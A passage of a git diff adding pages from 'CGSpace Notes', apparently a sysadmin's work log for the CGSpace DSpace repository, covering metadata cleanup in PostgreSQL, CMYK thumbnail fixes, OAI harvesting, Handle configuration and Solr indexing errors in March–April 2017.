dspace=# \copy (select resource_id, metadata_value_id from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='International Center for Tropical Agriculture') to /tmp/ciat.csv with csv;
+COPY 1968
+
    +
  • And then use awk to print the duplicate lines to a separate file:
  • +
+
$ awk -F',' 'seen[$1]++' /tmp/ciat.csv > /tmp/ciat-dupes.csv
+
    +
  • From that file I can create a list of 279 deletes and put them in a batch script like the following (a one-liner to generate the whole script is sketched after it):
  • +
+
delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and metadata_value_id=2742061;
+
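    +
  • A quick way to generate that batch script from the dupes CSV and run it in psql (a sketch; the second column of the CSV is the metadata_value_id):
  • +
+
$ awk -F',' '{print "delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and metadata_value_id=" $2 ";"}' /tmp/ciat-dupes.csv > /tmp/ciat-deletes.sql
+$ psql dspace < /tmp/ciat-deletes.sql
+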
+ + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2017-03/index.html b/docs/2017-03/index.html new file mode 100644 index 000000000..51e3ea596 --- /dev/null +++ b/docs/2017-03/index.html @@ -0,0 +1,409 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + March, 2017 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

March, 2017

+ +
+

2017-03-01

+
    +
  • Run the 279 CIAT author corrections on CGSpace
  • +
+

2017-03-02

+
    +
  • Skype with Michael and Peter, discussing moving the CGIAR Library to CGSpace
  • +
  • CGIAR people possibly open to moving content, redirecting library.cgiar.org to CGSpace and letting CGSpace resolve their handles
  • +
  • They might come in at the top level in one “CGIAR System” community, or with several communities
  • +
  • I need to spend a bit of time looking at the multiple handle support in DSpace and see if new content can be minted in both handles, or just one?
  • +
  • Need to send Peter and Michael some notes about this in a few days
  • +
  • Also, need to consider talking to Atmire about hiring them to bring ORCiD metadata to REST / OAI
  • +
  • Filed an issue on DSpace issue tracker for the filter-media bug that causes it to process JPGs even when limiting to the PDF thumbnail plugin: DS-3516
  • +
  • Discovered that the ImageMagic filter-media plugin creates JPG thumbnails with the CMYK colorspace when the source PDF is using CMYK
  • +
  • Interestingly, it seems DSpace 4.x’s thumbnails were sRGB, but forcing regeneration using DSpace 5.x’s ImageMagick plugin creates CMYK JPGs if the source PDF was CMYK (see 10568/51999):
  • +
+
$ identify ~/Desktop/alc_contrastes_desafios.jpg
+/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600+0+0 8-bit CMYK 168KB 0.000u 0:00.000
+
    +
  • This results in discolored thumbnails when compared to the original PDF, for example sRGB and CMYK:
  • +
+

Thumbnail in sRGB colorspace

+

Thumbnail in CMYK colorspace

+
    +
  • I filed an issue for the color space thing: DS-3517
  • +
+

2017-03-03

+ +
$ convert alc_contrastes_desafios.pdf\[0\] -profile /opt/brew/Cellar/ghostscript/9.20/share/ghostscript/9.20/iccprofiles/default_cmyk.icc -thumbnail 300x300 -flatten -profile /opt/brew/Cellar/ghostscript/9.20/share/ghostscript/9.20/iccprofiles/default_rgb.icc alc_contrastes_desafios.pdf.jpg
+
    +
  • This reads the input file, applies the CMYK profile, applies the RGB profile, then writes the file
  • +
  • Note that you should set the first profile immediately after the input file
  • +
  • Also, it is better to use profiles than to set -colorspace
  • +
  • This is a great resource describing the color stuff: http://www.imagemagick.org/Usage/formats/#profiles
  • +
  • Somehow we need to detect the color system being used by the input file and handle each case differently (with profiles)
  • +
  • This is trivial with identify (even by the Java ImageMagick API):
  • +
+
$ identify -format '%r\n' alc_contrastes_desafios.pdf\[0\]
+DirectClass CMYK
+$ identify -format '%r\n' Africa\ group\ of\ negotiators.pdf\[0\]
+DirectClass sRGB Alpha
+
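  • Putting those pieces together, a rough shell sketch of the detection and conditional conversion (the ICC profile paths are the ones from the convert command above; only apply the profiles when the first page is actually CMYK):

#!/usr/bin/env bash
# sketch: apply the CMYK→sRGB profiles only when the PDF's first page is CMYK
pdf=alc_contrastes_desafios.pdf
profiles=/opt/brew/Cellar/ghostscript/9.20/share/ghostscript/9.20/iccprofiles
if identify -format '%r\n' "${pdf}[0]" | grep -q CMYK; then
    convert "${pdf}[0]" -profile "$profiles/default_cmyk.icc" -thumbnail 300x300 -flatten -profile "$profiles/default_rgb.icc" "${pdf}.jpg"
else
    convert "${pdf}[0]" -thumbnail 300x300 -flatten "${pdf}.jpg"
fi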

2017-03-04

+
    +
  • Spent more time looking at the ImageMagick CMYK issue
  • +
  • The default_cmyk.icc and default_rgb.icc files are both part of the Ghostscript GPL distribution, but according to DSpace’s LICENSES_THIRD_PARTY file, DSpace doesn’t allow distribution of dependencies that are licensed solely under the GPL
  • +
  • So this issue is kinda pointless now, as the ICC profiles are absolutely necessary to make a meaningful CMYK→sRGB conversion
  • +
+

2017-03-05

+
    +
  • Look into helping developers from landportal.info with a query for items related to LAND on the REST API
  • +
  • They want something like the items that are returned by the general “LAND” query in the search interface, but we cannot do that
  • +
  • We can only return specific results for metadata fields, like:
  • +
+
$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "LAND REFORM", "language": null}' | json_pp
+
+
# List any additional prefixes that need to be managed by this handle server
+# (as for examle handle prefix coming from old dspace repository merged in
+# that repository)
+# handle.additional.prefixes = prefix1[, prefix2]
+
    +
  • Because of this I noticed that our Handle server’s config.dct was potentially misconfigured!
  • +
  • We had some default values still present:
  • +
+
"300:0.NA/YOUR_NAMING_AUTHORITY"
+
    +
  • I’ve changed them to the following and restarted the handle server:
  • +
+
"300:0.NA/10568"
+
    +
  • In looking at all the configs I just noticed that we are not providing a DOI in the Google-specific metadata crosswalk
  • +
  • From dspace/config/crosswalks/google-metadata.properties:
  • +
+
google.citation_doi = cg.identifier.doi
+
    +
  • This works, and makes DSpace output the following metadata on the item view page:
  • +
+
<meta content="https://dx.doi.org/10.1186/s13059-017-1153-y" name="citation_doi">
+
+

2017-03-06

+
    +
  • Someone on the mailing list said that handle.plugin.checknameauthority should be false if we’re using multiple handle prefixes
  • +
+

2017-03-07

+
    +
  • I set up a top-level community as a test for the CGIAR Library and imported one item with the 10947 handle prefix
  • +
  • When testing the Handle resolver locally it shows the item to be on the local repository
  • +
  • So this seems to work, with the following caveats: +
      +
    • New items will have the default handle
    • +
    • Communities and collections will have the default handle
    • +
    • Only items imported manually can have the other handles
    • +
    +
  • +
  • I need to talk to Michael and Peter to share the news, and discuss the structure of their community(s) and try some actual test data
  • +
  • We’ll need to do some data cleaning to make sure they are using the same fields we are, like dc.type and cg.identifier.status
  • +
  • Another thing is that the import process creates new dc.date.accessioned and dc.date.available fields, so we end up with duplicates (is it important to preserve the originals for these?)
  • +
  • Report DS-3520 issue to Atmire
  • +
+

2017-03-08

+
    +
  • Merge the author separator changes to 5_x-prod, as everyone has responded positively about it, and it’s the default in Mirage2 after all!
  • +
  • Cherry pick the commons-collections patch from DSpace’s dspace-5_x branch to address DS-3520: https://jira.duraspace.org/browse/DS-3520
  • +
+

2017-03-09

+
    +
  • Export list of sponsors so Peter can clean it up:
  • +
+
dspace=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'sponsorship') group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
+COPY 285
+

2017-03-12

+
    +
  • Test the sponsorship fixes and deletes from Peter:
  • +
+
$ ./fix-metadata-values.py -i Investors-Fix-51.csv -f dc.description.sponsorship -t Action -m 29 -d dspace -u dspace -p fuuuu
+$ ./delete-metadata-values.py -i Investors-Delete-121.csv -f dc.description.sponsorship -m 29 -d dspace -u dspace -p fuuu
+
    +
  • Generate a new list of unique sponsors so we can update the controlled vocabulary:
  • +
+
dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'sponsorship')) to /tmp/sponsorship.csv with csv;
+
+

Livestock CRP theme

+

2017-03-15

+ +

2017-03-16

+
    +
  • Merge pull request for PABRA subjects: https://github.com/ilri/DSpace/pull/310
  • +
  • Abenet and Peter say we can add them to Discovery, Atmire modules, etc, but I might not have time to do it now
  • +
  • Help Sisay with RTB theme again
  • +
  • Remove ICARDA subject from Discovery sidebar facets: https://github.com/ilri/DSpace/pull/312
  • +
  • Remove ICARDA subject from Browse and item submission form: https://github.com/ilri/DSpace/pull/313
  • +
  • Merge the CCAFS Phase II changes but hold off on doing the flagship metadata updates until Macaroni Bros gets their importer updated
  • +
  • Deploy latest changes and investor fixes/deletions on CGSpace
  • +
  • Run system updates on CGSpace and reboot server
  • +
+

2017-03-20

+ +

2017-03-24

+
    +
  • Still helping Sisay try to figure out how to create a theme for the RTB community
  • +
+

2017-03-28

+
    +
  • CCAFS said they are ready for the flagship updates for Phase II to be run (cg.subject.ccafs), so I ran them on CGSpace:
  • +
+
$ ./fix-metadata-values.py -i ccafs-flagships-feb7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p fuuu
+
    +
  • We’ve been waiting since February to run these
  • +
  • Also, I generated a list of all CCAFS flagships because there are a dozen or so more than there should be:
  • +
+
dspace=# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=210 group by text_value order by count desc) to /tmp/ccafs.csv with csv;
+
+

2017-03-29

+
    +
  • Dump a list of fields in the DC and CG schemas to compare with CG Core:
  • +
+
dspace=# select case when metadata_schema_id=1 then 'dc' else 'cg' end as schema, element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
+
    +
  • Ooh, a better one!
  • +
+
dspace=# select coalesce(case when metadata_schema_id=1 then 'dc.' else 'cg.' end) || concat_ws('.', element, qualifier) as field, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
+

2017-03-30

+
    +
  • Adjust the Linode CPU usage alerts for the CGSpace server from 150% to 200%, as generally the nightly Solr indexing causes a usage around 150–190%, so this should make the alerts less regular
  • +
  • Adjust the threshold for DSpace Test from 90 to 100%
  • +

April, 2017

+ +
+

2017-04-02

+
    +
  • Merge one change to CCAFS flagships that I had forgotten to remove last month (“MANAGING CLIMATE RISK”): https://github.com/ilri/DSpace/pull/317
  • +
  • Quick proof-of-concept hack to add dc.rights to the input form, including some inline instructions/hints:
  • +
+

dc.rights in the submission form

+
    +
  • Remove redundant/duplicate text in the DSpace submission license
  • +
  • Testing the CMYK patch on a collection with 650 items:
  • +
+
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
+

2017-04-03

+
    +
  • Continue testing the CMYK patch on more communities:
  • +
+
$ [dspace]/bin/dspace filter-media -f -i 10568/1 -p "ImageMagick PDF Thumbnail" -v >> /tmp/filter-media-cmyk.txt 2>&1
+
    +
  • So far there are almost 500:
  • +
+
$ grep -c profile /tmp/filter-media-cmyk.txt
+484
+
    +
  • Looking at the CG Core document again, I’ll send some feedback to Peter and Abenet: +
      +
    • We use cg.contributor.crp to indicate the CRP(s) affiliated with the item
    • +
    • DSpace has dc.date.available, but this field isn’t particularly meaningful other than as an automatic timestamp at the time of item accession (and is identical to dc.date.accessioned)
    • +
    • dc.relation exists in CGSpace, but isn’t used; rather we use dc.relation.ispartofseries, which is used ~5,000 times to hold the series name and number within that series
    • +
    +
  • +
  • Also, I’m noticing some weird outliers in cg.coverage.region, need to remember to go correct these later:
  • +
+
dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=227;
+

2017-04-04

+
    +
  • The filter-media script has been running on more large communities and now there are many more CMYK PDFs that have been fixed:
  • +
+
$ grep -c profile /tmp/filter-media-cmyk.txt
+1584
+
    +
  • Trying to find a way to get the number of items submitted by a certain user in 2016
  • +
  • It’s not possible in the DSpace search / module interfaces, but might be able to be derived from dc.description.provenance, as that field contains the name and email of the submitter/approver, ie:
  • +
+
Submitted by Francesca Giampieri (fgiampieri) on 2016-01-19T13:56:43Z^M
+No. of bitstreams: 1^M
+ILAC_Brief21_PMCA.pdf: 113462 bytes, checksum: 249fef468f401c066a119f5db687add0 (MD5)
+
    +
  • This SQL query returns fields that were submitted or approved by giampieri in 2016 and contain a “checksum” (ie, there was a bitstream in the submission):
  • +
+
dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^(Submitted|Approved).*giampieri.*2016-.*checksum.*';
+
    +
  • Then this one does the same, but for fields that don’t contain checksums (ie, there was no bitstream in the submission):
  • +
+
dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^(Submitted|Approved).*giampieri.*2016-.*' and text_value !~ '^(Submitted|Approved).*giampieri.*2016-.*checksum.*';
+
    +
  • For some reason there seem to be way too many fields, for example there are 498 + 13 here, which is 511 items for just this one user.
  • +
  • It looks like there can be a scenario where the user submitted AND approved it, so some records might be doubled…
  • +
  • In that case it might just be better to see how many the user submitted (both with and without bitstreams):
  • +
+
dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^Submitted.*giampieri.*2016-.*';
+
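  • And to just get the number rather than the full rows, a count should work (untested sketch):

dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^Submitted.*giampieri.*2016-.*';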

2017-04-05

+
    +
  • After doing a few more large communities it seems this is the final count of CMYK PDFs:
  • +
+
$ grep -c profile /tmp/filter-media-cmyk.txt
+2505
+

2017-04-06

+
    +
  • After reading the notes for DCAT April 2017 I am testing some new settings for PostgreSQL on DSpace Test (see the dspace.cfg sketch after this list): +
      +
    • db.maxconnections 30→70 (the default PostgreSQL config allows 100 connections, so DSpace’s default of 30 is quite low)
    • +
    • db.maxwait 5000→10000
    • +
    • db.maxidle 8→20 (DSpace default is -1, unlimited, but we had set it to 8 earlier)
    • +
    +
  • +
  • I need to look at the Munin graphs after a few days to see if the load has changed
  • +
  • Run system updates on DSpace Test and reboot the server
  • +
  • Discussing harvesting CIFOR’s DSpace via OAI
  • +
  • Sisay added their OAI as a source to a new collection, but using the Simple Dublin Core method, so many fields are unqualified and duplicated
  • +
  • Looking at the documentation it seems that we probably want to be using DSpace Intermediate Metadata
  • +
+
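  • For reference, the PostgreSQL pool settings mentioned above would look something like this in dspace.cfg after the change (a sketch, not a copy of our actual config):

# PostgreSQL connection pool tuning in dspace.cfg
db.maxconnections = 70
db.maxwait = 10000
db.maxidle = 20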

2017-04-10

+
    +
  • Adjust Linode CPU usage alerts on DSpace servers +
      +
    • CGSpace from 200 to 250%
    • +
    • DSpace Test from 100 to 150%
    • +
    +
  • +
  • Remove James from Linode access
  • +
  • Look into having CIFOR use a sub prefix of 10568 like 10568.01
  • +
  • Handle.net calls this “derived prefixes” and it seems this would work with DSpace if we wanted to go that route
  • +
  • CIFOR is starting to test aligning their metadata more with CGSpace/CG core
  • +
  • They shared a test item which is using cg.coverage.country, cg.subject.cifor, dc.subject, and dc.date.issued
  • +
  • Looking at their OAI I’m not sure it has updated as I don’t see the new fields: https://data.cifor.org/dspace/oai/request?verb=ListRecords&resumptionToken=oai_dc///col_11463_6/900
  • +
  • Maybe they need to make sure they are running the OAI cache refresh cron job, or maybe OAI doesn’t export these?
  • +
  • I added cg.subject.cifor to the metadata registry and I’m waiting for the harvester to re-harvest to see if it picks up more data now
  • +
  • Another possibility is that we could use a crosswalk… but I’ve never done it.
  • +
+

2017-04-11

+
    +
  • Looking at the item from CIFOR it hasn’t been updated yet, maybe they aren’t running the cron job
  • +
  • I emailed Usman from CIFOR to ask if he’s running the cron job
  • +
+

2017-04-12

+ +

stale metadata in OAI

+ +
$ /home/dspacetest.cgiar.org/bin/dspace oai import -c
+...
+63900 items imported so far...
+64000 items imported so far...
+Total: 64056 items
+Purging cached OAI responses.
+OAI 2.0 manager action ended. It took 829 seconds.
+
    +
  • After reading some threads on the DSpace mailing list, I see that clean-cache is actually only for caching responses, ie to client requests in the OAI web application
  • +
  • These are stored in [dspace]/var/oai/requests/
  • +
  • The import command should theoretically catch situations like this where an item’s metadata was updated, but in this case we changed the metadata schema and it doesn’t seem to catch it (could be a bug!)
  • +
  • Attempting a full rebuild of OAI on CGSpace:
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace oai import -c
+...
+58700 items imported so far...
+Total: 58789 items
+Purging cached OAI responses.
+OAI 2.0 manager action ended. It took 1032 seconds.
+
+real    17m20.156s
+user    4m35.293s
+sys     1m29.310s
+
+

2017-04-13

+
    +
  • Checking the CIFOR item on DSpace Test, it still doesn’t have the new metadata
  • +
  • The collection status shows this message from the harvester:
  • +
+
+

Last Harvest Result: OAI server did not contain any updates on 2017-04-13 02:19:47.964

+
+
    +
  • I don’t know why there were no updates detected, so I will reset and reimport the collection
  • +
  • Usman has set up a custom crosswalk called dimcg that now shows CG and CIFOR metadata namespaces, but we can’t use it because DSpace can only harvest DIM by default (from the harvesting user interface)
  • +
  • Also worth noting that the REST interface exposes all fields in the item, including CG and CIFOR fields: https://data.cifor.org/dspace/rest/items/944?expand=metadata
  • +
  • After re-importing the CIFOR collection it looks very good!
  • +
  • It seems like they have done a full metadata migration with dc.date.issued and cg.coverage.country etc
  • +
  • Submit pull request to upstream DSpace for the PDF thumbnail bug (DS-3516): https://github.com/DSpace/DSpace/pull/1709
  • +
+

2017-04-14

+ +

2017-04-17

+
    +
  • CIFOR has now implemented a new “cgiar” context in their OAI that exposes CG fields, so I am re-harvesting that to see how it looks in the Discovery sidebars and searches
  • +
  • See: https://data.cifor.org/dspace/oai/cgiar?verb=GetRecord&metadataPrefix=dim&identifier=oai:data.cifor.org:11463/947
  • +
  • One thing we need to remember if we start using OAI is to enable the autostart of the harvester process (see harvester.autoStart in dspace/config/modules/oai.cfg)
  • +
  • Error when running DSpace cleanup task on DSpace Test and CGSpace (on the same item), I need to look this up:
  • +
+
Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
+  Detail: Key (bitstream_id)=(435) is still referenced from table "bundle".
+

2017-04-18

+ +
$ git clone https://github.com/ilri/ckm-cgspace-rest-api.git
+$ cd ckm-cgspace-rest-api/app
+$ gem install bundler
+$ bundle
+$ cd ..
+$ rails -s
+
    +
  • I used Ansible to create a PostgreSQL user that only has SELECT privileges on the tables it needs:
  • +
+
+$ ansible linode02 -u aorth -b --become-user=postgres -K -m postgresql_user -a 'db=database name=username password=password priv=CONNECT/item:SELECT/metadatavalue:SELECT/metadatafieldregistry:SELECT/metadataschemaregistry:SELECT/collection:SELECT/handle:SELECT/bundle2bitstream:SELECT/bitstream:SELECT/bundle:SELECT/item2bundle:SELECT state=present'
+
+
$ bundle binstubs puma --path ./sbin
+

2017-04-19

+
    +
  • Usman sent another link to their OAI interface, where the country names are now capitalized: https://data.cifor.org/dspace/oai/cgiar?verb=GetRecord&metadataPrefix=dim&identifier=oai:data.cifor.org:11463/947
  • +
  • Looking at the same item in XMLUI, the countries are not capitalized: https://data.cifor.org/dspace/xmlui/handle/11463/947?show=full
  • +
  • So it seems he did it in the crosswalk!
  • +
  • Keep working on Ansible stuff for deploying the CKM REST API
  • +
  • We can use systemd’s Environment stuff to pass the database parameters to Rails
  • +
  • Abenet noticed that the “Workflow Statistics” option is missing now, but we have screenshots from a presentation in 2016 when it was there
  • +
  • I filed a ticket with Atmire
  • +
  • Looking at 933 CIAT records from Sisay, he’s having problems creating a SAF bundle to import to DSpace Test
  • +
  • I started by looking at his CSV in OpenRefine, and I see there a bunch of fields with whitespace issues that I cleaned up:
  • +
+
value.replace(" ||","||").replace("|| ","||").replace(" || ","||")
+
    +
  • Also, all the filenames have spaces and URL encoded characters in them, so I decoded them from URL encoding:
  • +
+
unescape(value,"url")
+
    +
  • Then create the filename column using the following transform from URL:
  • +
+
value.split('/')[-1].replace(/#.*$/,"")
+
    +
  • The replace part is because some URLs have an anchor like #page=14 which we obviously don’t want on the filename
  • +
  • Also, we need to only use the PDF on the item corresponding with page 1, so we don’t end up with literally hundreds of duplicate PDFs
  • +
  • Alternatively, I could export each page to a standalone PDF…
  • +
+

2017-04-20

+
    +
  • Atmire responded about the Workflow Statistics, saying that it had been disabled because many environments needed customization to be useful
  • +
  • I re-enabled it with a hidden config key workflow.stats.enabled = true on DSpace Test and will evaluate adding it on CGSpace
  • +
  • Looking at the CIAT data again, a bunch of items have metadata values ending in ||, which might cause blank fields to be added at import time
  • +
  • Cleaning them up with OpenRefine:
  • +
+
value.replace(/\|\|$/,"")
+
    +
  • Working with the CIAT data in OpenRefine to remove the filename column from all but the first item that uses a particular PDF, since many items point to the same PDF and keeping the filename on all of them would add hundreds of duplicates to the SAF bundle
  • +
  • I did some massaging in OpenRefine, flagging duplicates with stars and flags, then filtering and removing the filenames of those items
  • +
+

Flagging and filtering duplicates in OpenRefine

+
    +
  • Also there are loads of whitespace errors in almost every field, so I trimmed leading/trailing whitespace
  • +
  • Unbelievable, there are also metadata values like:
  • +
+
COLLETOTRICHUM LINDEMUTHIANUM||                  FUSARIUM||GERMPLASM
+
    +
  • Add a description to the file names using:
  • +
+
value + "__description:" + cells["dc.type"].value
+
    +
  • Test import of 933 records:
  • +
+
$ [dspace]/bin/dspace import -a -e aorth@mjanja.ch -c 10568/87193 -s /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ -m /tmp/ciat
+$ wc -l /tmp/ciat
+933 /tmp/ciat
+
    +
  • Run system updates on CGSpace and reboot server
  • +
  • This includes switching nginx to using upstream with keepalive instead of direct proxy_pass
  • +
  • Re-deploy CGSpace to latest 5_x-prod, including the PABRA and RTB XMLUI themes, as well as the PDF processing and CMYK changes
  • +
  • More work on Ansible infrastructure stuff for Tsega’s CKM DSpace REST API
  • +
  • I’m going to start re-processing all the PDF thumbnails on CGSpace, one community at a time:
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace filter-media -f -v -i 10568/71249 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
+
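  • If I end up scripting it, a simple loop over the community handles should do (sketch; the handles here are just ones I’ve used above):

$ for community in 10568/1 10568/16498 10568/71249; do [dspace]/bin/dspace filter-media -f -v -i "$community" -p "ImageMagick PDF Thumbnail" >> /tmp/filter-media-cmyk.txt 2>&1; done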

2017-04-22

+
    +
  • Someone on the dspace-tech mailing list responded with a suggestion about the foreign key violation in the cleanup task
  • +
  • The solution is to remove the ID (ie set to NULL) from the primary_bitstream_id column in the bundle table
  • +
  • After doing that and running the cleanup task again I find more bitstreams that are affected and end up with a long list of IDs that need to be fixed:
  • +
+
dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (435, 1136, 1132, 1220, 1236, 3002, 3255, 5322);
+

2017-04-24

+
    +
  • Two users mentioned some items they recently approved not showing up in the search / XMLUI
  • +
  • I looked at the logs from yesterday and it seems the Discovery indexing has been crashing:
  • +
+
2017-04-24 00:00:15,578 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Processing (55 of 58853): 70590
+2017-04-24 00:00:15,586 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Processing (56 of 58853): 74507
+2017-04-24 00:00:15,614 ERROR com.atmire.dspace.discovery.AtmireSolrService @ this IndexWriter is closed
+org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: this IndexWriter is closed
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+        at org.apache.solr.client.solrj.SolrServer.deleteByQuery(SolrServer.java:285)
+        at org.apache.solr.client.solrj.SolrServer.deleteByQuery(SolrServer.java:271)
+        at org.dspace.discovery.SolrServiceImpl.unIndexContent(SolrServiceImpl.java:331)
+        at org.dspace.discovery.SolrServiceImpl.unIndexContent(SolrServiceImpl.java:315)
+        at com.atmire.dspace.discovery.AtmireSolrService.indexContent(AtmireSolrService.java:803)
+        at com.atmire.dspace.discovery.AtmireSolrService.updateIndex(AtmireSolrService.java:876)
+        at org.dspace.discovery.IndexClient.main(IndexClient.java:127)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+
    +
  • Looking at the past few days of logs, it looks like the indexing process started crashing on 2017-04-20:
  • +
+
# grep -c 'IndexWriter is closed' [dspace]/log/dspace.log.2017-04-*
+[dspace]/log/dspace.log.2017-04-01:0
+[dspace]/log/dspace.log.2017-04-02:0
+[dspace]/log/dspace.log.2017-04-03:0
+[dspace]/log/dspace.log.2017-04-04:0
+[dspace]/log/dspace.log.2017-04-05:0
+[dspace]/log/dspace.log.2017-04-06:0
+[dspace]/log/dspace.log.2017-04-07:0
+[dspace]/log/dspace.log.2017-04-08:0
+[dspace]/log/dspace.log.2017-04-09:0
+[dspace]/log/dspace.log.2017-04-10:0
+[dspace]/log/dspace.log.2017-04-11:0
+[dspace]/log/dspace.log.2017-04-12:0
+[dspace]/log/dspace.log.2017-04-13:0
+[dspace]/log/dspace.log.2017-04-14:0
+[dspace]/log/dspace.log.2017-04-15:0
+[dspace]/log/dspace.log.2017-04-16:0
+[dspace]/log/dspace.log.2017-04-17:0
+[dspace]/log/dspace.log.2017-04-18:0
+[dspace]/log/dspace.log.2017-04-19:0
+[dspace]/log/dspace.log.2017-04-20:2293
+[dspace]/log/dspace.log.2017-04-21:5992
+[dspace]/log/dspace.log.2017-04-22:13278
+[dspace]/log/dspace.log.2017-04-23:22720
+[dspace]/log/dspace.log.2017-04-24:21422
+
    +
  • I restarted Tomcat and re-ran the discovery process manually:
  • +
+
[dspace]/bin/dspace index-discovery
+
    +
  • Now everything is ok
  • +
  • Finally finished manually running the cleanup task over and over and null’ing the conflicting IDs:
  • +
+
dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (435, 1132, 1136, 1220, 1236, 3002, 3255, 5322, 5098, 5982, 5897, 6245, 6184, 4927, 6070, 4925, 6888, 7368, 7136, 7294, 7698, 7864, 10799, 10839, 11765, 13241, 13634, 13642, 14127, 14146, 15582, 16116, 16254, 17136, 17486, 17824, 18098, 22091, 22149, 22206, 22449, 22548, 22559, 22454, 22253, 22553, 22897, 22941, 30262, 33657, 39796, 46943, 56561, 58237, 58739, 58734, 62020, 62535, 64149, 64672, 66988, 66919, 76005, 79780, 78545, 81078, 83620, 84492, 92513, 93915);
+
    +
  • Now running the cleanup script on DSpace Test and already seeing 11GB freed from the assetstore—it’s likely we haven’t had a cleanup task complete successfully in years…
  • +
+
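  • In hindsight, one query could probably have nulled all of the offending bundles at once instead of re-running the cleanup task over and over (untested sketch, assuming the DSpace 5 bitstream table’s deleted column is what the cleanup task keys on):

dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (select bitstream_id from bitstream where deleted is true);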

2017-04-25

+
    +
  • Finally finished running the PDF thumbnail re-processing on CGSpace, the final count of CMYK PDFs is about 2751
  • +
  • Preparing to run the cleanup task on CGSpace, I want to see how many files are in the assetstore:
  • +
+
# find [dspace]/assetstore/ -type f | wc -l
+113104
+
    +
  • Troubleshooting the Atmire Solr update process that runs at 3:00 AM every morning, after finishing at 100% it has this error:
  • +
+
[=================================================> ]99% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:12
+[=================================================> ]99% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:12
+[=================================================> ]99% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:12
+[=================================================> ]99% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:13
+[==================================================>]100% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:13
+java.lang.RuntimeException: java.lang.ClassNotFoundException: org.dspace.statistics.content.SpecifiedDSODatasetGenerator
+	at com.atmire.statistics.display.StatisticsGraph.parseDatasetGenerators(SourceFile:254)
+	at org.dspace.statistics.content.StatisticsDisplay.<init>(SourceFile:203)
+	at com.atmire.statistics.display.StatisticsGraph.<init>(SourceFile:116)
+	at com.atmire.statistics.display.StatisticsGraphFactory.getStatisticsDisplay(SourceFile:25)
+	at com.atmire.statistics.display.StatisticsDisplayFactory.parseStatisticsDisplay(SourceFile:67)
+	at com.atmire.statistics.display.StatisticsDisplayFactory.getStatisticsDisplays(SourceFile:49)
+	at com.atmire.statistics.statlet.XmlParser.getStatisticsDisplays(SourceFile:178)
+	at com.atmire.statistics.statlet.XmlParser.getStatisticsDisplays(SourceFile:111)
+	at com.atmire.utils.ReportSender$ReportRunnable.run(SourceFile:151)
+	at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
+	at java.util.concurrent.FutureTask.run(FutureTask.java:266)
+	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
+	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
